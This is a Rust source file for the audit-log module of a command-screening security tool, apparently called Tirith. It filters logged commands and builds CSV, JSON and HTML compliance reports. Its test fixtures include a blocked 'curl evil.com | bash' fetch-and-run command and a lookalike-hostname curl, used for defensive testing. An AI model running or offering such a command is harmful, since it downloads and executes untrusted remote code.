Skip to main content

tirith_core/
audit_aggregator.rs

1/// Audit log aggregation, analytics, and compliance reporting.
2///
3/// Reads JSONL audit log files and provides:
4/// - Export: filter + format as JSON/CSV
5/// - Stats: summary analytics per session or overall
6/// - Report: structured compliance report
7use std::collections::HashMap;
8use std::path::Path;
9
10use serde::{Deserialize, Serialize};
11
12/// A parsed audit log entry (superset of what we write — tolerates missing fields).
13#[derive(Debug, Clone, Serialize, Deserialize)]
14pub struct AuditRecord {
15    pub timestamp: String,
16    #[serde(default)]
17    pub session_id: String,
18    pub action: String,
19    #[serde(default)]
20    pub rule_ids: Vec<String>,
21    #[serde(default)]
22    pub command_redacted: String,
23    #[serde(default)]
24    pub bypass_requested: bool,
25    #[serde(default)]
26    pub bypass_honored: bool,
27    #[serde(default)]
28    pub interactive: bool,
29    #[serde(default)]
30    pub policy_path: Option<String>,
31    #[serde(default)]
32    pub event_id: Option<String>,
33    #[serde(default)]
34    pub tier_reached: u8,
35}
36
37/// Filters for audit log queries.
38#[derive(Debug, Default)]
39pub struct AuditFilter {
40    /// Only include records at or after this ISO 8601 date.
41    pub since: Option<String>,
42    /// Only include records at or before this ISO 8601 date.
43    pub until: Option<String>,
44    /// Filter to a specific session ID.
45    pub session_id: Option<String>,
46    /// Filter to records with a specific action (Allow, Warn, Block).
47    pub action: Option<String>,
48    /// Filter to records matching any of these rule IDs.
49    pub rule_ids: Vec<String>,
50}
51
52/// Summary statistics from audit records.
53#[derive(Debug, Clone, Serialize)]
54pub struct AuditStats {
55    pub total_commands: usize,
56    pub total_findings: usize,
57    pub actions: HashMap<String, usize>,
58    pub top_rules: Vec<(String, usize)>,
59    pub block_rate: f64,
60    pub sessions_seen: usize,
61    pub time_range: Option<(String, String)>,
62}
63
64/// Result of reading an audit log, including accounting for skipped lines.
65pub struct ReadLogResult {
66    pub records: Vec<AuditRecord>,
67    pub skipped_lines: usize,
68}
69
70/// Read and parse all records from a JSONL audit log.
71pub fn read_log(path: &Path) -> Result<ReadLogResult, String> {
72    let content = std::fs::read_to_string(path)
73        .map_err(|e| format!("Failed to read {}: {e}", path.display()))?;
74
75    let mut records = Vec::new();
76    let mut skipped_lines = 0usize;
77    for (line_num, line) in content.lines().enumerate() {
78        let line = line.trim();
79        if line.is_empty() {
80            continue;
81        }
82        match serde_json::from_str::<AuditRecord>(line) {
83            Ok(record) => records.push(record),
84            Err(e) => {
85                eprintln!(
86                    "tirith: warning: skipping malformed audit line {} in {}: {e}",
87                    line_num + 1,
88                    path.display()
89                );
90                skipped_lines += 1;
91            }
92        }
93    }
94    Ok(ReadLogResult {
95        records,
96        skipped_lines,
97    })
98}
99
100/// Parse an RFC 3339 timestamp, falling back to lexicographic comparison on failure.
101fn parse_ts(ts: &str) -> Option<chrono::DateTime<chrono::FixedOffset>> {
102    chrono::DateTime::parse_from_rfc3339(ts).ok()
103}
104
105/// Filter records by the given criteria.
106pub fn filter_records(records: &[AuditRecord], filter: &AuditFilter) -> Vec<AuditRecord> {
107    records
108        .iter()
109        .filter(|r| {
110            // CR-10: Parse timestamps for proper timezone-aware comparison
111            if let Some(ref since) = filter.since {
112                match (parse_ts(&r.timestamp), parse_ts(since)) {
113                    (Some(rt), Some(st)) => {
114                        if rt < st {
115                            return false;
116                        }
117                    }
118                    _ => {
119                        // Fallback to lexicographic if parsing fails
120                        if r.timestamp.as_str() < since.as_str() {
121                            return false;
122                        }
123                    }
124                }
125            }
126            if let Some(ref until) = filter.until {
127                match (parse_ts(&r.timestamp), parse_ts(until)) {
128                    (Some(rt), Some(ut)) => {
129                        if rt > ut {
130                            return false;
131                        }
132                    }
133                    _ => {
134                        if r.timestamp.as_str() > until.as_str() {
135                            return false;
136                        }
137                    }
138                }
139            }
140            if let Some(ref sid) = filter.session_id {
141                if r.session_id != *sid {
142                    return false;
143                }
144            }
145            if let Some(ref action) = filter.action {
146                if !r.action.eq_ignore_ascii_case(action) {
147                    return false;
148                }
149            }
150            if !filter.rule_ids.is_empty()
151                && !r.rule_ids.iter().any(|rid| filter.rule_ids.contains(rid))
152            {
153                return false;
154            }
155            true
156        })
157        .cloned()
158        .collect()
159}
160
161/// Compute summary statistics from a set of audit records.
162pub fn compute_stats(records: &[AuditRecord]) -> AuditStats {
163    let mut actions: HashMap<String, usize> = HashMap::new();
164    let mut rule_counts: HashMap<String, usize> = HashMap::new();
165    let mut sessions: std::collections::HashSet<String> = std::collections::HashSet::new();
166    let mut total_findings = 0usize;
167
168    for record in records {
169        *actions.entry(record.action.clone()).or_insert(0) += 1;
170        sessions.insert(record.session_id.clone());
171        total_findings += record.rule_ids.len();
172        for rid in &record.rule_ids {
173            *rule_counts.entry(rid.clone()).or_insert(0) += 1;
174        }
175    }
176
177    let block_count = *actions.get("Block").unwrap_or(&0) as f64;
178    let total = records.len() as f64;
179    let block_rate = if total > 0.0 {
180        block_count / total
181    } else {
182        0.0
183    };
184
185    let mut top_rules: Vec<(String, usize)> = rule_counts.into_iter().collect();
186    top_rules.sort_by(|a, b| b.1.cmp(&a.1));
187    top_rules.truncate(10);
188
189    let time_range = if records.is_empty() {
190        None
191    } else {
192        // Use min/max by parsed timestamp (not first/last which assumes order)
193        let min_ts = records
194            .iter()
195            .min_by(
196                |a, b| match (parse_ts(&a.timestamp), parse_ts(&b.timestamp)) {
197                    (Some(ta), Some(tb)) => ta.cmp(&tb),
198                    _ => a.timestamp.cmp(&b.timestamp),
199                },
200            )
201            .map(|r| r.timestamp.clone())
202            .unwrap_or_default();
203        let max_ts = records
204            .iter()
205            .max_by(
206                |a, b| match (parse_ts(&a.timestamp), parse_ts(&b.timestamp)) {
207                    (Some(ta), Some(tb)) => ta.cmp(&tb),
208                    _ => a.timestamp.cmp(&b.timestamp),
209                },
210            )
211            .map(|r| r.timestamp.clone())
212            .unwrap_or_default();
213        Some((min_ts, max_ts))
214    };
215
216    AuditStats {
217        total_commands: records.len(),
218        total_findings,
219        actions,
220        top_rules,
221        block_rate,
222        sessions_seen: sessions.len(),
223        time_range,
224    }
225}
226
227/// Export records as JSON array.
228pub fn export_json(records: &[AuditRecord]) -> String {
229    serde_json::to_string_pretty(records).unwrap_or_else(|e| {
230        eprintln!("tirith: audit: JSON serialization failed: {e}");
231        "[]".to_string()
232    })
233}
234
235/// Export records as CSV (RFC 4180 compliant).
236pub fn export_csv(records: &[AuditRecord]) -> String {
237    let mut out = String::new();
238    out.push_str(
239        "timestamp,session_id,action,rule_ids,command_redacted,bypass_requested,tier_reached\n",
240    );
241    for r in records {
242        let rules = r.rule_ids.join(";");
243        out.push_str(&format!(
244            "{},{},{},{},{},{},{}\n",
245            csv_escape(&r.timestamp),
246            csv_escape(&r.session_id),
247            csv_escape(&r.action),
248            csv_escape(&rules),
249            csv_escape(&r.command_redacted),
250            r.bypass_requested,
251            r.tier_reached
252        ));
253    }
254    out
255}
256
257/// Escape a field for RFC 4180 CSV: if it contains commas, double quotes,
258/// or newlines, wrap in double quotes and double any internal quotes.
259fn csv_escape(field: &str) -> String {
260    if field.contains(',') || field.contains('"') || field.contains('\n') || field.contains('\r') {
261        let escaped = field.replace('"', "\"\"");
262        format!("\"{escaped}\"")
263    } else {
264        field.to_string()
265    }
266}
267
268/// Generate a markdown compliance report from audit records.
269pub fn generate_compliance_report(records: &[AuditRecord], stats: &AuditStats) -> String {
270    let mut report = String::new();
271
272    report.push_str("# Tirith Compliance Report\n\n");
273
274    // Executive summary
275    report.push_str("## Executive Summary\n\n");
276    report.push_str(&format!(
277        "- **Total commands analyzed:** {}\n",
278        stats.total_commands
279    ));
280    report.push_str(&format!("- **Total findings:** {}\n", stats.total_findings));
281    report.push_str(&format!(
282        "- **Block rate:** {:.1}%\n",
283        stats.block_rate * 100.0
284    ));
285    report.push_str(&format!(
286        "- **Sessions observed:** {}\n",
287        stats.sessions_seen
288    ));
289
290    if let Some((ref first, ref last)) = stats.time_range {
291        report.push_str(&format!("- **Time range:** {first} to {last}\n"));
292    }
293    report.push('\n');
294
295    // Action breakdown
296    report.push_str("## Action Breakdown\n\n");
297    report.push_str("| Action | Count |\n|--------|-------|\n");
298    let mut actions: Vec<_> = stats.actions.iter().collect();
299    actions.sort_by(|(a, _), (b, _)| a.cmp(b));
300    for (action, count) in &actions {
301        report.push_str(&format!("| {} | {count} |\n", escape_md_cell(action)));
302    }
303    report.push('\n');
304
305    // Top rules
306    if !stats.top_rules.is_empty() {
307        report.push_str("## Top Triggered Rules\n\n");
308        report.push_str("| Rule ID | Count |\n|---------|-------|\n");
309        for (rule, count) in &stats.top_rules {
310            report.push_str(&format!("| {} | {count} |\n", escape_md_cell(rule)));
311        }
312        report.push('\n');
313    }
314
315    // Blocked commands summary
316    let blocked: Vec<_> = records
317        .iter()
318        .filter(|r| r.action.eq_ignore_ascii_case("Block"))
319        .collect();
320    if !blocked.is_empty() {
321        report.push_str("## Blocked Commands\n\n");
322        report.push_str(
323            "| Timestamp | Rules | Command Preview |\n|-----------|-------|-----------------|\n",
324        );
325        for r in blocked.iter().take(50) {
326            let rules = r.rule_ids.join(", ");
327            report.push_str(&format!(
328                "| {} | {} | {} |\n",
329                escape_md_cell(&r.timestamp),
330                escape_md_cell(&rules),
331                escape_md_cell(&r.command_redacted)
332            ));
333        }
334        if blocked.len() > 50 {
335            report.push_str(&format!(
336                "\n*...and {} more blocked commands*\n",
337                blocked.len() - 50
338            ));
339        }
340        report.push('\n');
341    }
342
343    report
344}
345
346/// Generate a self-contained HTML compliance report from audit records.
347pub fn generate_html_report(records: &[AuditRecord], stats: &AuditStats) -> String {
348    let mut html = String::new();
349    html.push_str(
350        r#"<!DOCTYPE html>
351<html lang="en">
352<head>
353<meta charset="utf-8">
354<title>Tirith Compliance Report</title>
355<style>
356body { font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, sans-serif; max-width: 900px; margin: 2rem auto; padding: 0 1rem; color: #1a1a2e; background: #f8f9fa; }
357h1 { color: #16213e; border-bottom: 2px solid #0f3460; padding-bottom: 0.5rem; }
358h2 { color: #0f3460; margin-top: 2rem; }
359table { border-collapse: collapse; width: 100%; margin: 1rem 0; }
360th, td { border: 1px solid #dee2e6; padding: 0.5rem 0.75rem; text-align: left; }
361th { background: #0f3460; color: white; }
362tr:nth-child(even) { background: #e9ecef; }
363.stat { display: inline-block; background: white; border: 1px solid #dee2e6; border-radius: 8px; padding: 1rem 1.5rem; margin: 0.5rem; text-align: center; min-width: 120px; }
364.stat-value { font-size: 1.5rem; font-weight: bold; color: #0f3460; }
365.stat-label { font-size: 0.85rem; color: #6c757d; }
366.footer { margin-top: 3rem; padding-top: 1rem; border-top: 1px solid #dee2e6; color: #6c757d; font-size: 0.85rem; }
367</style>
368</head>
369<body>
370<h1>Tirith Compliance Report</h1>
371"#,
372    );
373
374    // Stats cards
375    html.push_str("<div>\n");
376    html.push_str(&format!(
377        "<div class=\"stat\"><div class=\"stat-value\">{}</div><div class=\"stat-label\">Commands</div></div>\n",
378        stats.total_commands
379    ));
380    html.push_str(&format!(
381        "<div class=\"stat\"><div class=\"stat-value\">{}</div><div class=\"stat-label\">Findings</div></div>\n",
382        stats.total_findings
383    ));
384    html.push_str(&format!(
385        "<div class=\"stat\"><div class=\"stat-value\">{:.1}%</div><div class=\"stat-label\">Block Rate</div></div>\n",
386        stats.block_rate * 100.0
387    ));
388    html.push_str(&format!(
389        "<div class=\"stat\"><div class=\"stat-value\">{}</div><div class=\"stat-label\">Sessions</div></div>\n",
390        stats.sessions_seen
391    ));
392    html.push_str("</div>\n");
393
394    if let Some((ref first, ref last)) = stats.time_range {
395        html.push_str(&format!(
396            "<p><strong>Time range:</strong> {} to {}</p>\n",
397            html_escape(first),
398            html_escape(last)
399        ));
400    }
401
402    // Action breakdown
403    html.push_str("<h2>Action Breakdown</h2>\n<table><tr><th>Action</th><th>Count</th></tr>\n");
404    let mut actions: Vec<_> = stats.actions.iter().collect();
405    actions.sort_by(|(a, _), (b, _)| a.cmp(b));
406    for (action, count) in &actions {
407        html.push_str(&format!(
408            "<tr><td>{}</td><td>{}</td></tr>\n",
409            html_escape(action),
410            count
411        ));
412    }
413    html.push_str("</table>\n");
414
415    // Top rules
416    if !stats.top_rules.is_empty() {
417        html.push_str(
418            "<h2>Top Triggered Rules</h2>\n<table><tr><th>Rule ID</th><th>Count</th></tr>\n",
419        );
420        for (rule, count) in &stats.top_rules {
421            html.push_str(&format!(
422                "<tr><td>{}</td><td>{}</td></tr>\n",
423                html_escape(rule),
424                count
425            ));
426        }
427        html.push_str("</table>\n");
428    }
429
430    // Blocked commands
431    let blocked: Vec<_> = records
432        .iter()
433        .filter(|r| r.action.eq_ignore_ascii_case("Block"))
434        .collect();
435    if !blocked.is_empty() {
436        html.push_str("<h2>Blocked Commands</h2>\n<table><tr><th>Timestamp</th><th>Rules</th><th>Command Preview</th></tr>\n");
437        for r in blocked.iter().take(50) {
438            let rules = r.rule_ids.join(", ");
439            html.push_str(&format!(
440                "<tr><td>{}</td><td>{}</td><td>{}</td></tr>\n",
441                html_escape(&r.timestamp),
442                html_escape(&rules),
443                html_escape(&r.command_redacted),
444            ));
445        }
446        html.push_str("</table>\n");
447        if blocked.len() > 50 {
448            html.push_str(&format!(
449                "<p><em>...and {} more blocked commands</em></p>\n",
450                blocked.len() - 50
451            ));
452        }
453    }
454
455    html.push_str("<div class=\"footer\">Generated by Tirith</div>\n</body>\n</html>\n");
456    html
457}
458
459/// Escape a markdown table cell: pipe characters and newlines break table formatting.
460fn escape_md_cell(s: &str) -> String {
461    s.replace('|', "\\|").replace('\n', " ").replace('\r', "")
462}
463
464/// Escape HTML special characters.
465fn html_escape(s: &str) -> String {
466    s.replace('&', "&amp;")
467        .replace('<', "&lt;")
468        .replace('>', "&gt;")
469        .replace('"', "&quot;")
470}
471
472#[cfg(test)]
473mod tests {
474    use super::*;
475
476    fn sample_records() -> Vec<AuditRecord> {
477        vec![
478            AuditRecord {
479                timestamp: "2026-01-15T10:00:00Z".into(),
480                session_id: "sess-001".into(),
481                action: "Block".into(),
482                rule_ids: vec!["curl_pipe_shell".into()],
483                command_redacted: "curl evil.com | bash".into(),
484                bypass_requested: false,
485                bypass_honored: false,
486                interactive: true,
487                policy_path: None,
488                event_id: Some("evt-1".into()),
489                tier_reached: 3,
490            },
491            AuditRecord {
492                timestamp: "2026-01-15T10:01:00Z".into(),
493                session_id: "sess-001".into(),
494                action: "Allow".into(),
495                rule_ids: vec![],
496                command_redacted: "ls -la".into(),
497                bypass_requested: false,
498                bypass_honored: false,
499                interactive: true,
500                policy_path: None,
501                event_id: Some("evt-2".into()),
502                tier_reached: 1,
503            },
504            AuditRecord {
505                timestamp: "2026-01-16T12:00:00Z".into(),
506                session_id: "sess-002".into(),
507                action: "Warn".into(),
508                rule_ids: vec!["non_ascii_hostname".into()],
509                command_redacted: "curl http://examp\u{0142}e.com".into(),
510                bypass_requested: false,
511                bypass_honored: false,
512                interactive: false,
513                policy_path: None,
514                event_id: None,
515                tier_reached: 3,
516            },
517        ]
518    }
519
520    #[test]
521    fn test_filter_by_session() {
522        let records = sample_records();
523        let filter = AuditFilter {
524            session_id: Some("sess-001".into()),
525            ..Default::default()
526        };
527        let filtered = filter_records(&records, &filter);
528        assert_eq!(filtered.len(), 2);
529    }
530
531    #[test]
532    fn test_filter_by_action() {
533        let records = sample_records();
534        let filter = AuditFilter {
535            action: Some("Block".into()),
536            ..Default::default()
537        };
538        let filtered = filter_records(&records, &filter);
539        assert_eq!(filtered.len(), 1);
540        assert_eq!(filtered[0].action, "Block");
541    }
542
543    #[test]
544    fn test_filter_by_since() {
545        let records = sample_records();
546        let filter = AuditFilter {
547            since: Some("2026-01-16T00:00:00Z".into()),
548            ..Default::default()
549        };
550        let filtered = filter_records(&records, &filter);
551        assert_eq!(filtered.len(), 1);
552        assert_eq!(filtered[0].session_id, "sess-002");
553    }
554
555    #[test]
556    fn test_filter_by_rule_ids() {
557        let records = sample_records();
558        let filter = AuditFilter {
559            rule_ids: vec!["curl_pipe_shell".into()],
560            ..Default::default()
561        };
562        let filtered = filter_records(&records, &filter);
563        assert_eq!(filtered.len(), 1);
564    }
565
566    #[test]
567    fn test_compute_stats() {
568        let records = sample_records();
569        let stats = compute_stats(&records);
570
571        assert_eq!(stats.total_commands, 3);
572        assert_eq!(stats.total_findings, 2);
573        assert_eq!(stats.sessions_seen, 2);
574        assert!((stats.block_rate - 1.0 / 3.0).abs() < 0.01);
575        assert!(stats.time_range.is_some());
576    }
577
578    #[test]
579    fn test_export_csv() {
580        let records = sample_records();
581        let csv = export_csv(&records);
582        let lines: Vec<&str> = csv.lines().collect();
583        assert_eq!(lines.len(), 4); // header + 3 records
584        assert!(lines[0].starts_with("timestamp,"));
585        assert!(lines[1].contains("Block"));
586    }
587
588    #[test]
589    fn test_export_json() {
590        let records = sample_records();
591        let json = export_json(&records);
592        let parsed: Vec<AuditRecord> = serde_json::from_str(&json).unwrap();
593        assert_eq!(parsed.len(), 3);
594    }
595
596    #[test]
597    fn test_compliance_report() {
598        let records = sample_records();
599        let stats = compute_stats(&records);
600        let report = generate_compliance_report(&records, &stats);
601
602        assert!(report.contains("# Tirith Compliance Report"));
603        assert!(report.contains("Total commands analyzed"));
604        assert!(report.contains("Block"));
605        assert!(report.contains("curl_pipe_shell"));
606    }
607
608    #[test]
609    fn test_csv_escape() {
610        assert_eq!(csv_escape("simple"), "simple");
611        assert_eq!(csv_escape("has,comma"), "\"has,comma\"");
612        assert_eq!(csv_escape("has\"quote"), "\"has\"\"quote\"");
613        assert_eq!(csv_escape("has\nnewline"), "\"has\nnewline\"");
614        assert_eq!(csv_escape("a,b\"c\nd"), "\"a,b\"\"c\nd\"");
615    }
616
617    #[test]
618    fn test_export_csv_rfc4180() {
619        let records = vec![AuditRecord {
620            timestamp: "2026-01-15T10:00:00Z".into(),
621            session_id: "sess-001".into(),
622            action: "Block".into(),
623            rule_ids: vec!["test_rule".into()],
624            command_redacted: "echo \"hello, world\"".into(),
625            bypass_requested: false,
626            bypass_honored: false,
627            interactive: true,
628            policy_path: None,
629            event_id: None,
630            tier_reached: 3,
631        }];
632        let csv = export_csv(&records);
633        let lines: Vec<&str> = csv.lines().collect();
634        assert_eq!(lines.len(), 2);
635        // Field with comma and quotes should be properly escaped
636        assert!(lines[1].contains("\"echo \"\"hello, world\"\"\""));
637    }
638
639    #[test]
640    fn test_empty_records() {
641        let records: Vec<AuditRecord> = vec![];
642        let stats = compute_stats(&records);
643        assert_eq!(stats.total_commands, 0);
644        assert_eq!(stats.block_rate, 0.0);
645        assert!(stats.time_range.is_none());
646    }
647}